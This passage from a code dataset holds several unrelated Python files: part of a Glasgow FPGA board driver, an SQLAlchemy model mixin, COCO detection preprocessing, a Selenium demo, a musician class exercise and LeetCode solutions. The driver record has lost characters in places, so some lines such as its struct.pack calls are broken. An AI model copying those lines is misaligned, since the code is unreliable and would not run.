0\n elif kind == \"ice\":\n base_offset = 1\n else:\n raise ValueError(\"Unknown EEPROM kind {}\".format(kind))\n return 0x10000 * base_offset + addr\n\n async def read_eeprom(self, kind, addr, length):\n \"\"\"\n Read ``length`` bytes at ``addr`` from EEPROM of kind ``kind``\n in ``chunk_size`` byte chunks. Valid ``kind`` is ``\"fx2\"`` or ``\"ice\"``.\n \"\"\"\n logger.debug(\"reading %s EEPROM range %04x-%04x\",\n kind, addr, addr + length - 1)\n addr = self._adjust_eeprom_addr_for_kind(kind, addr)\n result = bytearray()\n while length > 0:\n chunk_addr = addr & ((1 << 16) - 1)\n chunk_length = min(chunk_addr + length, 1 << 16) - chunk_addr\n result += await self._read_eeprom_raw(addr >> 16, chunk_addr, chunk_length)\n addr += chunk_length\n length -= chunk_length\n return result\n\n async def write_eeprom(self, kind, addr, data):\n \"\"\"\n Write ``data`` to ``addr`` in EEPROM of kind ``kind``\n in ``chunk_size`` byte chunks. 
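The read_eeprom/write_eeprom wrappers above flatten a multi-chip address space: the high 16 bits of the adjusted address select the chip index and the low 16 bits the in-chip offset, and every chunk is clipped so it never crosses a 64 KiB boundary. A minimal standalone sketch of that clipping arithmetic (the function name is mine, not from the driver):

def split_into_pages(addr, length):
    # Build (chip_index, in_chip_addr, chunk_length) tuples, never letting
    # a chunk cross a 64 KiB page boundary.
    chunks = []
    while length > 0:
        in_page = addr & 0xFFFF
        chunk = min(in_page + length, 1 << 16) - in_page
        chunks.append((addr >> 16, in_page, chunk))
        addr += chunk
        length -= chunk
    return chunks

# A 10-byte access straddling the boundary splits into two chunks:
assert split_into_pages(0xFFFB, 10) == [(0, 0xFFFB, 5), (1, 0x0000, 5)]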
Valid ``kind`` is ``\"fx2\"`` or ``\"ice\"``.\n \"\"\"\n logger.debug(\"writing %s EEPROM range %04x-%04x\",\n kind, addr, addr + len(data) - 1)\n addr = self._adjust_eeprom_addr_for_kind(kind, addr)\n while len(data) > 0:\n chunk_addr = addr & ((1 << 16) - 1)\n chunk_length = min(chunk_addr + len(data), 1 << 16) - chunk_addr\n await self._write_eeprom_raw(addr >> 16, chunk_addr, data[:chunk_length])\n addr += chunk_length\n data = data[chunk_length:]\n\n async def _status(self):\n result = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_STATUS, 0, 0, 1)\n return result[0]\n\n async def status(self):\n \"\"\"\n Query device status.\n\n Returns a set of flags out of ``{\"fpga-ready\", \"alert\"}``.\n \"\"\"\n status_word = await self._status()\n status_set = set()\n # Status should be queried and ST_ERROR cleared after every operation that may set it,\n # so we ignore it here.\n if status_word & ST_FPGA_RDY:\n status_set.add(\"fpga-ready\")\n if status_word & ST_ALERT:\n status_set.add(\"alert\")\n return status_set\n\n async def bitstream_id(self):\n \"\"\"\n Get bitstream ID for the bitstream currently running on the FPGA,\n or ``None`` if the FPGA does not have a bitstream.\n \"\"\"\n bitstream_id = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_BITSTREAM_ID,\n 0, 0, 16)\n if re.match(rb\"^\\x00+$\", bitstream_id):\n return None\n return bytes(bitstream_id)\n\n async def download_bitstream(self, bitstream, bitstream_id=b\"\\xff\" * 16):\n \"\"\"Download ``bitstream`` with ID ``bitstream_id`` to FPGA.\"\"\"\n # Send consecutive chunks of bitstream.\n # Sending 0th chunk resets the FPGA.\n index = 0\n while index * 1024 < len(bitstream):\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_FPGA_CFG,\n 0, index, bitstream[index * 1024:(index + 1) * 1024])\n index += 1\n # Complete configuration by setting bitstream ID.\n # This starts the FPGA.\n try:\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_BITSTREAM_ID,\n 0, 0, bitstream_id)\n except usb1.USBErrorPipe:\n raise GlasgowDeviceError(\"FPGA configuration failed\")\n\n async def download_target(self, plan, rebuild=False):\n if await self.bitstream_id() == plan.bitstream_id and not rebuild:\n logger.info(\"device already has bitstream ID %s\", plan.bitstream_id.hex())\n else:\n logger.info(\"building bitstream ID %s\", plan.bitstream_id.hex())\n await self.download_bitstream(plan.execute(), plan.bitstream_id)\n\n async def _iobuf_enable(self, on):\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_IOBUF_ENABLE, on, 0, [])\n\n @staticmethod\n def _iobuf_spec_to_mask(spec, one):\n if one and len(spec) != 1:\n raise GlasgowDeviceError(\"exactly one I/O port may be specified for this operation\")\n\n mask = 0\n for port in str(spec):\n if port == \"A\":\n mask |= IO_BUF_A\n elif port == \"B\":\n mask |= IO_BUF_B\n else:\n raise GlasgowDeviceError(\"unknown I/O port {}\".format(port))\n return mask\n\n @staticmethod\n def _mask_to_iobuf_spec(mask):\n spec = \"\"\n if mask & IO_BUF_A:\n spec += \"A\"\n if mask & IO_BUF_B:\n spec += \"B\"\n return spec\n\n async def _write_voltage(self, req, spec, volts):\n millivolts = round(volts * 1000)\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, req,\n 0, self._iobuf_spec_to_mask(spec, one=False), struct.pack(\" 5.0 * (1 + tolerance):\n raise GlasgowDeviceError(\"I/O port {} voltage ({} V) too high\"\n .format(spec, voltage))\n await self.set_voltage(spec, voltage)\n await self.set_alert_tolerance(spec, voltage, tolerance=0.05)\n\n async def get_alert(self, spec):\n 
try:\n low_millivolts, high_millivolts = struct.unpack(\"= \"C\"\n\n async def set_pulls(self, spec, low=set(), high=set()):\n assert self.has_pulls\n assert not {bit for bit in low | high if bit >= len(spec) * 8}\n\n for index, port in enumerate(spec):\n port_enable = 0\n port_value = 0\n for port_bit in range(0, 8):\n if index * 8 + port_bit in low | high:\n port_enable |= 1 << port_bit\n if index * 8 + port_bit in high:\n port_value |= 1 << port_bit\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_PULL,\n 0, self._iobuf_spec_to_mask(port, one=True),\n struct.pack(\"BB\", port_enable, port_value))\n # Check if we've succeeded\n if await self._status() & ST_ERROR:\n raise GlasgowDeviceError(\"cannot set I/O port(s) {} pull resistors to \"\n \"low={} high={}\"\n .format(spec or \"(none)\", low or \"{}\", high or \"{}\"))\n\n async def _register_error(self, addr):\n if await self._status() & ST_FPGA_RDY:\n raise GlasgowDeviceError(\"register 0x{:02x} does not exist\".format(addr))\n else:\n raise GlasgowDeviceError(\"FPGA is not configured\")\n\n async def read_register(self, addr, width=1):\n \"\"\"Read ``width``-byte FPGA register at ``addr``.\"\"\"\n try:\n value = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_REGISTER, addr, 0, width)\n value = int.from_bytes(value, byteorder=\"little\")\n logger.trace(\"register %d read: %#04x\", addr, value)\n return value\n except usb1.USBErrorPipe:\n await self._register_error(addr)\n\n async def write_register(self, addr, value, width=1):\n \"\"\"Write ``value`` to ``width``-byte FPGA register at ``addr``.\"\"\"\n try:\n logger.trace(\"register %d write: %#04x\", addr, value)\n value = value.to_bytes(width, byteorder=\"big\")\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_REGISTER, addr, 0, value)\n except usb1.USBErrorPipe:\n await self._register_error(addr)\n","sub_path":"software/glasgow/device/hardware.py","file_name":"hardware.py","file_ext":"py","file_size_in_byte":22592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"270796336","text":"from sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base, declared_attr, as_declarative\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy import inspect\nfrom db import session\n# Base model the other model(s) will subclass\nBase = declarative_base()\n\nclass BaseModelMixin(object):\n \"\"\"\n Add the ability to perform some queries in any class that subclasses\n this mixin. This prevents alot of repeated code such as, update,\n delete, and getting a specific or multiple instances from the\n corresponding table\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Set all values to None to prevent argument erros\n Keep the create method for more readability\n \"\"\"\n for field in self.get_fields():\n setattr(self, field, None)\n\n def to_dict(self, includes=[], excludes=[]):\n \"\"\"\n WARNING\n This is to be called from an existing instance so it has\n access to existing values\n\n\n Take in a list of includes and/or excludes then return a\n dictionary of fields and values. 
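To make the include/exclude contract of to_dict concrete, here is a tiny self-contained model of the same behavior (the class and field names are hypothetical, not from this codebase):

class DictMixin:
    def to_dict(self, includes=(), excludes=()):
        # includes wins when given; otherwise everything except excludes.
        fields = includes or [f for f in vars(self) if f not in excludes]
        return {f: getattr(self, f) for f in fields}

class User(DictMixin):
    def __init__(self):
        self.id, self.username, self.email = 1, 'abc', 'a@b.c'

assert User().to_dict(includes=['id']) == {'id': 1}
assert User().to_dict(excludes=['email']) == {'id': 1, 'username': 'abc'}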
If includes is passed but\n not excludes, it will return all fields that were in includes.\n If excludes is passed but not includes, it will return all fields\n except those in excludes.\n If neither are passed, it will return ALL fields and values in the model\n \"\"\"\n serialized_fields = {}\n # Get all fields if neither excludes or includes is passed\n if len(includes) == 0:\n for field in self.get_fields():\n if field in excludes:\n continue\n # Make sure the class has the attribute\n try:\n serialized_fields[field] = getattr(self, field)\n except AttributeError:\n raise AttributeError(\"Tried to get field %s but %s doesn't exist\") % (field, field)\n except Exception as e:\n raise Exception(\"Uncaught exception in %s.to_dict() ERROR: %s\" % (self.__class__.__name__, e))\n return serialized_fields\n\n # Get only the fields that were included\n elif len(includes) > 0:\n for field in includes:\n try:\n serialized_fields[field] = getattr(self, field)\n except AttributeError:\n raise AttributeError(\"Tried to get field %s but %s doesn't exist\") % (field, field)\n except Exception as e:\n raise Exception(\"Uncaught exception in %s.to_dict() ERROR: %s\" % (self.__class__.__name__, e))\n return serialized_fields\n\n @classmethod\n def instance_exists(cls, **info):\n \"\"\"\n Try to find an instance with the passed information\n if at least one instance exists, return True else False\n \"\"\"\n instance = session.query(cls).filter_by(**info).first()\n return instance != None\n\n @classmethod\n def get_instance(cls, multiple=False, **info):\n \"\"\"\n Get an instance from the database with the given info\n If multiple is True, this function will return all\n instances that were retrieved.\n Otherwise (and by default) it will return the first.\n If no row was found, this will throw a NoResultFound error\n \"\"\"\n # Don't waste time, 'cache' the query result\n query = session.query(cls).filter_by(**info)\n # .first() will return None if no matching rows were found\n if query.first():\n if multiple:\n return query.all()\n return query.first()\n else:\n raise NoResultFound(f\"\\nFailed to find instance from table '{cls.__tablename__}'\")\n\n @classmethod\n def create(cls, **info):\n \"\"\"\n PLEASE NOTE: To validate fields, you'll need to write validation functions\n review this for more information on validation... 
https://docs.sqlalchemy.org/en/13/orm/mapped_attributes.html\n If you need to extend this functionality, override it by making a new create function\n in your class.\n This takes in a dictionary of information, instantiates a new instance,\n loops the passed info, updates the new instance, adds it to the pending sql,\n commits it to the database and returns the newly created user\n \"\"\"\n # account for the user model because we need\n # to call user.set_password() to properly\n # set the password with encryption\n new_instance = cls()\n if hasattr(cls, \"password_hash\"):\n new_instance.set_password(info.get('password'))\n info.pop('password')\n\n\n for field, value in info.items():\n if hasattr(cls, field):\n if field == \"password_hash\":\n continue\n setattr(new_instance, field, value)\n else:\n raise AttributeError(f\"Tried to set {field} to {value} but this {cls} does not have a {field} field\")\n session.add(new_instance)\n session.commit()\n created_instance = session.query(cls).filter_by(**info).first()\n # Account for Recipes not being able to be fetched with the preceding query\n if created_instance == None:\n return session.query(cls).filter(cls.id==new_instance.id).first()\n return created_instance\n\n\n @classmethod\n def update(cls, id, **info):\n \"\"\"\n WARNING\n This will NOT work if updating a relationship.\n See the comments in the following SO post\n https://stackoverflow.com/questions/23152337/how-to-update-sqlalchemy-orm-object-by-a-python-dict\n This gets an object from the database matching the id\n then uses the kwargs to update its fields\n \"\"\"\n instance = session.query(cls).get(id)\n for field, value in info.items():\n if hasattr(instance, field):\n setattr(instance, field, value)\n else:\n raise AttributeError(f\"Could not update {cls} instance because {cls} does not have a {field} field\")\n session.commit()\n\n @classmethod\n def delete(cls, id):\n \"\"\"\n This retrieves and deletes an instance from the database\n **May need to take in an extra arg to configure delete behavior**\n \"\"\"\n # get_instance() will raise a NoResultFound error if the user doesn't exist\n instance = cls.get_instance(**{'id': id})\n session.delete(instance)\n session.commit()\n\n @classmethod\n def get_fields(cls):\n \"\"\"\n Get all the names used for the columns in the model definition\n build a list and return them\n \"\"\"\n fields = []\n mapper = inspect(cls)\n for field in mapper.attrs:\n fields.append(field.key)\n return fields\n\n def add_to_relationship(self, field, child):\n \"\"\"\n Add a child to the relationship defined in the field arg\n \"\"\"\n # Account for a non-existent child\n try:\n children = getattr(self, field)\n children.append(child)\n except:\n raise Exception(\"Failed to add %s to %s relationship field %s\" % (child, self, field))\n setattr(self, field, children)\n session.add(self)\n session.commit()\n\n def remove_from_relationship(self, field, child):\n \"\"\"\n Remove a child from the relationship field provided in the argument\n \"\"\"\n try:\n children = getattr(self, field)\n children.remove(child)\n except:\n raise Exception(\"Failed to remove %s from %s relationship field %s\" % (child, self, field))\n setattr(self, field, children)\n session.add(self)\n session.commit()\n\n def assign_one_to_one(self, field, instance):\n \"\"\"\n Assign an object to a one to one field (like assigning a profile instance to user.profile)\n \"\"\"\n setattr(self, field, instance)\n session.add(self)\n session.commit()\n\n @staticmethod\n def 
do_rollback():\n session.rollback()","sub_path":"server/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"214636182","text":"import glob\r\nimport os\r\n\r\ndirs = os.listdir(\".\")\r\nprint(dirs)\r\nfor element in dirs:\r\n if element.endswith(\"out\"):\r\n os.system(\"C:\\\\Strawberry\\\\perl\\\\bin\\\\perl.exe FORCES_modified.pl \" + element[:-4] + \" \" + element[:-4])\r\n\r\n\r\nos.system(\"move *dat dats\\\\\")","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80886810","text":"# preprocessing steps for coco detection and nearest neighbors retrieval\n\nimport detection_util\nimport _pickle\nimport numpy as np\nfrom pycocotools.coco import COCO\n\nfeatures_set = 'features2_tiny'\nD_SET = 1472\n#features_set = 'features2_small'\n#D_SET = 11776\n\nif 'coco_train' not in locals():\n annFile='{}/annotations/instances_{}.json'.format(dataDir, 'train2014') # annotations # slightly weird to load here since passed to this module's fns by another script\n coco_train = COCO(annFile) # initialize COCO api for instance annotations\n \n [img_ids_train, feats_train] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, 'train2014'),'rb'),encoding='latin1')\n img_ids_train, unique_idx = np.unique(img_ids_train, return_index=True)\n img_ids_train = img_ids_train.tolist()\n feats_train = feats_train[unique_idx, :, :, :]\n\nfeaturizer = detection_util.Featurizer()\ncategory_list = ['bear', 'bird', 'cat', 'cow', 'dog', 'elephant',\n 'giraffe', 'horse', 'sheep', 'zebra', 'airplane', \n 'bicycle', 'boat', 'bus', 'car', 'motorcycle', \n 'train', 'truck']\n\ndef get_retrieval_dataset(dataSet, coco, return_feats=True, splitter_mat=[], num_imgs=-1):\n if not return_feats:\n assert splitter_mat.size # non-empty splitter matrix needed to return projections when return_feats = False\n print('getting bbox data...')\n bboxes_store = _pickle.load(open('{}/bboxes_retrieval/{}_bboxes_retrieval.p'.format(dataDir, dataSet),'rb'),encoding='bytes')\n if dataSet == 'train2014':\n img_ids, feats = img_ids_train, feats_train\n else:\n [img_ids, feats] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, dataSet),'rb'),encoding='latin1')\n img_ids, unique_idx = np.unique(img_ids, return_index=True)\n img_ids = img_ids.tolist()\n feats = feats[unique_idx, :, :, :]\n if num_imgs > 0:\n img_ids = img_ids[:num_imgs]\n feats = feats[:num_imgs]\n X = [] # note only 'X' OR 'projections' is used\n projections = []\n bboxes = []\n box_img_ids = []\n box_cats = []\n for img_id in img_ids:\n candidate_boxes = get_bboxes(img_id, bboxes_store) # load saved selective search output # can getting labels be made into fn?\n if candidate_boxes is None:\n# print('image skipped')\n continue\n \n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n cat_id_list = get_cat_id_list(category_list, coco)\n true_boxes = []\n true_box_cats = []\n for ann in anns:\n if ann['category_id'] in cat_id_list:\n true_boxes += [ann['bbox']] # += adds to list\n true_box_cats += [ann['category_id']]\n box_cats_img = np.ones((np.shape(candidate_boxes)[0], 1))*-1\n for i, candidate in enumerate(candidate_boxes):\n best_iou = 0\n for j, true_box in enumerate(true_boxes):\n iou_curr = detection_util.iou(candidate, true_box)\n if 
iou_curr >= 0.5 and iou_curr > best_iou:\n box_cats_img[i] = true_box_cats[j]\n best_iou = iou_curr\n \n img = coco.loadImgs([img_id])[0]\n img_feats = feats[img_ids.index(img_id)]\n X_img = boxes_to_feats(candidate_boxes, img, img_feats)\n X_img, unique_idx_img = np.unique(X_img, return_index=True, axis=0) # throw out duplicate feat rows\n if X_img is not None: \n if return_feats:\n X.append(X_img)\n else:\n proj_img = np.matmul(X_img, splitter_mat)\n projections.append(proj_img)\n bboxes.append(candidate_boxes[unique_idx_img])\n box_cats.append(box_cats_img[unique_idx_img])\n box_img_ids.append(np.ones((len(unique_idx_img),1))*img_id)\n box_cats = np.squeeze(np.vstack(box_cats))\n bboxes = np.vstack(bboxes)\n box_img_ids = np.squeeze(np.vstack(box_img_ids))\n if return_feats:\n X = np.vstack(X)\n return X, box_cats, bboxes, box_img_ids\n else:\n projections = np.vstack(projections)\n return projections, box_cats, bboxes, box_img_ids\n\ndef get_designed_dataset(dataSet, category, coco, get_pos=True): \n bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs = prepare_labels(dataSet, category, coco)\n print(category, 'pos', len(cat_pos_imgs), 'imgs')\n \n print('getting designed training subsample')\n Xpos = []\n Xneg_p = []\n for img_id in cat_pos_imgs:\n candidate_boxes = get_bboxes(img_id, bboxes_store) # load saved selective search output # can getting labels be made into fn?\n if candidate_boxes is None:\n# print('image skipped')\n continue\n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n true_boxes = []\n for ann in anns:\n if ann['category_id'] == coco.getCatIds(catNms=[category])[0]:\n true_boxes += [ann['bbox']]\n labels = np.array([get_label(candidate, true_boxes) for candidate in candidate_boxes])\n pos_box_idx = np.array([i for i, x in enumerate(labels) if x == 1])\n neg_box_idx = np.array([i for i, x in enumerate(labels) if x == 0])\n neg_boxes_sample_idx = neg_box_idx[np.random.permutation(len(neg_box_idx))[0:len(pos_box_idx)]] #sample as many neg as there are pos\n# neg_boxes_sample_idx = neg_box_idx[np.random.permutation(len(neg_box_idx))[0:(2*len(pos_box_idx))]] #sample twice as many neg as there are pos\n \n pos_boxes = candidate_boxes[pos_box_idx.astype(int)] \n neg_boxes_sample = candidate_boxes[neg_boxes_sample_idx]\n \n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n # img_pil = Image.open('%s/%s/%s'%(dataDir, dataSet, img['file_name']))\n img_feats = feats[img_ids.index(img_id)]\n # img_feats = feats[np.where(img_ids == img_id)]\n \n if get_pos:\n Xpos_img = boxes_to_feats(pos_boxes, img, img_feats)\n if Xpos_img is not None: Xpos.append(Xpos_img)\n Xneg_img = boxes_to_feats(neg_boxes_sample, img, img_feats)\n if Xneg_img is not None: Xneg_p.append(Xneg_img)\n if get_pos: Xpos = np.vstack(Xpos)\n Xneg_p = np.vstack(Xneg_p)\n \n cat_neg_imgs = np.array(cat_neg_imgs)\n cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:len(cat_pos_imgs)]]\n# cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:(2*len(cat_pos_imgs))]]\n draws_per_image = np.shape(Xpos)[0] // len(cat_pos_imgs)\n \n Xneg_n = []\n for img_id in cat_neg_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n \n if candidate_boxes is None:\n# print('image skipped')\n continue\n if np.shape(candidate_boxes)[0] < draws_per_image:\n num_draws = np.shape(candidate_boxes)[0]\n else:\n num_draws = draws_per_image\n \n neg_boxes_sample = 
candidate_boxes[np.random.permutation(np.shape(candidate_boxes)[0])[0:num_draws]]\n \n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n img_feats = feats[img_ids.index(img_id)]\n \n Xneg_img = boxes_to_feats(neg_boxes_sample, img, img_feats)\n if Xneg_img is not None: Xneg_n.append(Xneg_img)\n Xneg_n = np.vstack(Xneg_n)\n return Xpos, Xneg_p, Xneg_n\n\ndef get_random_dataset(dataSet, category, sample_sizes, coco):\n bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs = prepare_labels(dataSet, category, coco)\n print('selecting', dataSet, 'sample')\n \n cat_pos_imgs = np.array(cat_pos_imgs)\n cat_neg_imgs = np.array(cat_neg_imgs)\n cat_pos_imgs_sample = cat_pos_imgs[np.random.permutation(len(cat_pos_imgs))[0:sample_sizes[0]]]\n cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:sample_sizes[1]]]\n X = []\n Y = []\n for img_id in cat_pos_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y)\n for img_id in cat_neg_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y)\n X = np.vstack(X)\n Y = np.vstack(Y)\n return X, Y\n\ndef get_random_boxes_uniform(dataSet, category, boxes_per_image, coco):\n bboxes_store, img_ids, feats, _, _ = prepare_labels(dataSet, category, coco)\n print('selecting', dataSet, 'sample')\n X = []\n Y = []\n for img_id in img_ids:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n box_sample = candidate_boxes[np.random.permutation(len(candidate_boxes))[:boxes_per_image]]\n append_img_feats(img_id, box_sample, coco, img_ids, feats, X, Y)\n X = np.vstack(X)\n Y = np.vstack(Y)\n return X, Y\n\ndef prepare_labels(dataSet, category, coco):\n bboxes_store = _pickle.load(open('{}/bboxes/{}_bboxes.p'.format(dataDir, dataSet),'rb'),encoding='bytes')\n if dataSet == 'train2014':\n img_ids, feats = img_ids_train, feats_train\n else:\n [img_ids, feats] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, dataSet),'rb'),encoding='latin1')\n img_ids, unique_idx = np.unique(img_ids, return_index=True)\n img_ids = img_ids.tolist()\n feats = feats[unique_idx, :, :, :]\n \n catId = coco.getCatIds(catNms=[category])\n pos_full = coco.getImgIds(catIds=catId )\n cat_pos_imgs = list(set(pos_full) & set(img_ids))\n cat_neg_imgs = [x for x in img_ids if x not in cat_pos_imgs]\n return bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs\n\ndef append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y): # TODO: candidate boxes probably the wrong name to use...\n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n true_boxes = []\n for ann in anns:\n true_boxes += [ann['bbox']]\n labels = np.zeros((len(candidate_boxes),1))\n labels[:,0] = [get_label(candidate, true_boxes) for candidate in candidate_boxes]\n\n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n img_feats = feats[img_ids.index(img_id)]\n \n X_img = boxes_to_feats(candidate_boxes, img, img_feats)\n if X_img is not None:\n X.append(X_img)\n Y.append(labels)\n\ndef get_bboxes(img_id, bboxes_store):\n bboxes_idx = bboxes_store[0].index(img_id)\n return bboxes_store[1][bboxes_idx]\n\ndef 
get_label(candidate, true_boxes):\n for true_box in true_boxes:\n if detection_util.iou(candidate, true_box) >= 0.5:\n return 1\n return 0\n\ndef boxes_to_feats(boxes, img, img_feats): \n num_boxes = np.shape(boxes)[0]\n if num_boxes == 0:\n return None\n first_row = box_to_feat(boxes[0], img, img_feats)\n X_img = np.zeros((num_boxes, len(first_row)))\n X_img[0,:] = first_row\n for i in np.arange(1,num_boxes):\n X_img[i,:] = box_to_feat(boxes[i], img, img_feats)\n return X_img\n\ndef box_to_feat(box, img, img_feats):\n projected_box = detection_util.project_onto_feature_space(box, (img['width'], img['height']))\n return featurizer.featurize(projected_box, img_feats)\n\ndef get_cat_id_list(cat_names, coco):\n cats = coco.loadCats(coco.getCatIds()) # categories\n cat_name_to_id = {cat['name']: cat['id'] for cat in cats} # category name to id mapping\n return [cat_name_to_id[cat] for cat in cat_names]\n\ndef concatenate_set(segment_list, label_list):\n lengths = [np.shape(segment)[0] for segment in segment_list]\n Ytemp = [];\n for i, length in enumerate(lengths):\n Ytemp.append(np.ones((length,1))*label_list[i])\n Y = np.vstack(Ytemp)\n X = np.vstack(segment_list)\n return X, Y\n","sub_path":"coco_preprocess.py","file_name":"coco_preprocess.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642622646","text":"#!/usr/bin/python3\n\n# musician_class.py\n__author__ = 'Les Tallman'\n\n\nclass Bands(object):\n\n members = []\n\n def __init__(self, name, manager):\n self.name = name\n self.manager = manager\n # self.hire = hire\n # self.fire = fire\n\n\nclass Musician(Bands):\n def __init__(self, sounds):\n Bands.sounds = sounds\n\n def solo(self, length):\n for i in range(length):\n # print(self.sounds[i % len(self.sounds)], end=\" \")\n print(self.sounds[i % len(self.sounds)])\n print()\n\n\nclass Bassist(Musician): # The Musician class is the parent of the Bassist class\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"Twang\", \"Thrumb\", \"Bling\"])\n\n\nclass Guitarist(Musician):\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"Boink\", \"Bow\", \"Boom\"])\n\n def tune(self):\n print(\"Be with you in a moment\")\n print(\"Twoning, sproing, splang\")\n return \"\\nAll tuned up and ready to Rock & Roll!!\"\n\n\nclass Drummer(Musician):\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"bum\", \"brrum\", \"brrrumble\", \"badum tish\"])\n\n def tune(self):\n print(\"Give me a whew, please.\")\n print(\"badum tish! \", \"gada, gada, gada \", \"tink\")\n return \"\\nI'm all warmed up.. 
Lets do this!!\"\n\n def count(self):\n print(\"\\nOne\", \"\\nTwo\", \"\\nThree\", \"\\nFour\")\n return \"\"\n\n def combust(self):\n print(\"Crackel\", \"Pop\", \"Boom\")\n return \"I'm on FIRE!!!, Baby....\"\n\nguitarist = Guitarist(\"Nigel Nettle\")\nbassist = Bassist(\"Kenny Hood\")\ndrummer = Drummer(\"Cindy Thunder\")\n\nfirst_band = Bands(\"Rip Cords\", \"Kevin Smith\")\nfirst_band.members.append(guitarist.name)\nfirst_band.members.append(bassist.name)\nfirst_band.members.append(drummer.name)\nprint(\"\\nThe Bands name is: {}\".format(first_band.name))\nprint(\"{} is the manager of The {}.\\n\".format(first_band.manager, first_band.name))\nprint(\"Members of the band are:\")\nfor member in first_band.members:\n print(member)\n\nprint(\"\\n\\n\")\nprint(guitarist.name)\nprint(\"Tuning....\")\nprint(guitarist.tune())\n\nprint(\"\\n\")\nprint(drummer.name)\nprint(\"Warming up as well!!\")\nprint(drummer.tune())\n\nprint(bassist.name)\nprint(\"I'm always ready\")\n\nprint(drummer.count())\nguitarist.solo(6)\nbassist.solo(1)\ndrummer.solo(3)\n\nprint(drummer.combust())","sub_path":"musician_class/musician_class.py","file_name":"musician_class.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524388621","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nclass Screenshots():\n\n def test(self):\n driver = webdriver.Chrome()\n driver.maximize_window()\n #driver.get(\"https://learn.letskodeit.com/p/practice\")\n #Открываем стрвницу этой командой\n driver.execute_script(\"window.location = 'https://learn.letskodeit.com/p/practice';\")\n driver.implicitly_wait(5)\n #element = driver.find_element(By.ID, \"name\")\n element = driver.execute_script(\"return document.getElementById('name');\")\n element.send_keys(\"Test\")\n time.sleep(4)\n driver.quit()\n\nrun = Screenshots()\nrun.test()","sub_path":"letskodeit/125javaScriptExecution.py","file_name":"125javaScriptExecution.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195237596","text":"class Solution(object):\r\n def helper(self, allowed, target, so_far, cache):\r\n if len(allowed) == 0:\r\n return False\r\n state = tuple(allowed)\r\n if state in cache:\r\n return cache[state]\r\n else:\r\n cache[state] = False\r\n if max(allowed) + so_far >= target:\r\n cache[state] = True\r\n else:\r\n for x in allowed:\r\n new_allowed = [y for y in allowed if x!=y]\r\n if self.helper(new_allowed, target, so_far+x, cache) == False:\r\n cache[state] = True\r\n break\r\n return cache[state]\r\n\r\n def canIWin(self, maxChoosableInteger, desiredTotal):\r\n allowed = [x for x in range(1, maxChoosableInteger+1)]\r\n if sum(allowed) < desiredTotal:\r\n return False\r\n return self.helper(allowed, desiredTotal, 0, {})\r\n","sub_path":"Linkedin/LC464CanIWin.py","file_name":"LC464CanIWin.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1043086","text":"#\n# @lc app=leetcode id=594 lang=python\n#\n# [594] Longest Harmonious Subsequence\n#\n# https://leetcode.com/problems/longest-harmonious-subsequence/description/\n#\n# algorithms\n# Easy (43.06%)\n# Likes: 